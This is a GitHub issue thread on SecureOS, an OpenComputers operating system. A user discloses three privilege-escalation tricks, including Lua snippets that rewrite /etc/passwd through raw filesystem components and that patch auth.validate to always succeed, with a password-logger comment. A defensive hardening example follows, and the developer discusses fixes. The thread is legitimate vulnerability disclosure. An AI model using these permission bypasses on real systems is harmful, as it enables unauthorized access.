Shuudoushi / SecureOS

The official operating system of OpenSecurity.

How to hack SecureOS... #42

Closed mpmxyz closed 9 years ago

mpmxyz commented 9 years ago

Hello there, I know that 100% security probably isn't your goal, but here are some examples of how you can modify /etc/passwd to get su rights:

variant 1: use direct component access to modify the file

local component = require("component")
-- Walk the raw filesystem components directly instead of going through the
-- OS filesystem API, so no OS-level permission check is ever consulted.
for address in pairs(component.list("filesystem")) do
  local fs = component.proxy(address)
  if fs.exists("/etc/passwd") then
    local handle = fs.open("/etc/passwd") --default mode is read
    local content = fs.read(handle, 1024) --quick and dirty: has obvious problems with larger files
    fs.close(handle)
    content = content:gsub(":0", ":1") --quick and dirty: also changes your password with a probability of 1/16
    handle = fs.open("/etc/passwd","w")
    fs.write(handle, content)
    fs.close(handle)
  end
end

variant 2: modify auth library step 1

local auth = require("auth")
-- require() returns the shared module table, so replacing the function here
-- changes what every later caller (including sudo) sees.
function auth.validate(username, password)
  --TODO: insert password logger here
  return true, true --unlimited power!
end

step 2: sudo edit /etc/passwd

variant 3: my favorite

  1. edit /tmp/.root, type something, Ctrl + S, Ctrl + W
  2. edit /etc/passwd
  3. ???
  4. profit
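The first two variants share a root cause that an OS can close: `require` hands every caller the same mutable module table, and the raw `component` API is reachable without any privilege check. The block below is an added example (mine, not SecureOS code and not from either poster) of the two building blocks a kernel could use against them: a read-only module proxy and a guarded `component` wrapper. `isRoot` is a hypothetical predicate standing in for however SecureOS tracks the current user, and `fakeComponent` and `realAuth` at the bottom are constructed stand-ins for the OpenComputers component API and the auth module so the block runs in stock Lua 5.2 or later. Variant 3 is a design problem rather than a coding one: a root marker living in a world-writable /tmp cannot be made trustworthy by wrapping anything.

```lua
-- Added example, not SecureOS code.  Two hardening primitives for the
-- attacks described above, written for plain Lua 5.2+.

-- 1. Defeats variant 2.  Callers get an empty proxy whose reads fall through
--    to the real table and whose writes raise.  The kernel keeps the real
--    table private and calls validate() on it, never on the proxy.
local function readonly(real, name)
  return setmetatable({}, {
    __index = real,
    __newindex = function(_, key)
      error(("cannot modify field '%s' of read-only module %s")
        :format(tostring(key), name), 2)
    end,
    __pairs = function() return pairs(real) end,
    __metatable = "locked",  -- getmetatable() returns this; setmetatable() errors
  })
end

-- 2. Defeats variant 1.  Raw proxies and raw invocations of components that
--    bypass the OS filesystem layer are refused unless the caller is root.
--    component.type/proxy/invoke are real OpenComputers component API calls.
local RESTRICTED = { filesystem = true, drive = true }

local function guardComponent(component, isRoot)  -- isRoot: hypothetical kernel predicate
  local guarded = {}
  for k, v in pairs(component) do guarded[k] = v end  -- list(), type(), ... stay available

  local function deny(ctype)
    error("permission denied: raw " .. ctype .. " access requires root", 3)
  end

  guarded.proxy = function(address, ...)
    local ctype = component.type(address)
    if RESTRICTED[ctype] and not isRoot() then deny(ctype) end
    return component.proxy(address, ...)
  end

  guarded.invoke = function(address, method, ...)
    local ctype = component.type(address)
    if RESTRICTED[ctype] and not isRoot() then deny(ctype) end
    return component.invoke(address, method, ...)
  end

  return readonly(guarded, "component")
end

-- Constructed stand-in for the OpenComputers component library (only the
-- calls used above), so this file runs outside the mod.
local fakeComponent = {
  type   = function(address) return address == "fs-1" and "filesystem" or "gpu" end,
  proxy  = function(address) return { address = address } end,
  invoke = function(address, method) return method end,
}

local currentUser = "mpmxyz"                       -- constructed session state
local function isRoot() return currentUser == "root" end

local component = guardComponent(fakeComponent, isRoot)
assert(component.proxy("gpu-1").address == "gpu-1")     -- non-filesystem component: allowed
assert(not pcall(component.proxy, "fs-1"))               -- variant 1 as a normal user: denied
assert(not pcall(component.invoke, "fs-1", "open"))      -- same via invoke(): denied
assert(not pcall(function() component.proxy = nil end))  -- patching the wrapper: denied
currentUser = "root"
assert(component.proxy("fs-1").address == "fs-1")        -- root keeps raw access

-- Constructed auth module: the kernel holds realAuth, users get the proxy.
local realAuth = { validate = function(user, pw) return false, false end }
local auth = readonly(realAuth, "auth")
assert(not pcall(function() auth.validate = function() return true, true end end))
assert(realAuth.validate("mpmxyz", "x") == false)        -- kernel's view is unchanged
print("all checks passed")
```

Two caveats for anyone wiring this into a real kernel. `rawset(auth, "validate", f)` still adds a field to the caller's proxy table, so each `require` should hand out a fresh proxy (or the sandbox should drop `rawset`), and the kernel must only ever call the real table it kept. Likewise the guard only helps if every path to the component library (the `component` global, `package.loaded.component`, and any `debug` access) points at the guarded table; one unguarded reference reopens variant 1.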
Shuudoushi commented 9 years ago

Yeah... the /tmp/.root thing is meant to be a temp thing till I find a better way of handling it... More than likely going to use a keygen system, like one-time passwords.

Shuudoushi commented 9 years ago

There is another issue with what you have here: it requires you to already be in the system, so most, if not all, security can be bypassed in one way or another, even in real *nix systems, though not as easily.

BTW, which branch did you find these vulnerabilities in? Some of these, if not all, may not work in the latest dev build. If you'll be so kind as to let me know if these workarounds work in the dev build as well, it'll be a great help. Thank you.

mpmxyz commented 9 years ago

I used the current master branch installer but all three attacks work with the current dev branch. (btw.: Nice updating system! Changing to the dev branch was very easy.)

Shuudoushi commented 9 years ago

It's not quite that nice of an update system >.> It has no version check, so it just overwrites all files on the list... Still need to get a version check system going... But it is nice to hear that it's as easy to use as I hoped :P

As far as the issues at hand go, I'll start looking into ways of defeating them when I have time to work on SOS again. Thank you again for bringing this information to my attention.

Shuudoushi commented 9 years ago

Still have things that need to be cleaned up and added before I merge to the release branch, but do let me know if everything is working as it should. (BTW, sudo update -a dev will make it so you will always pull updates from the dev branch when you run sudo update, just in case you didn't know already :P)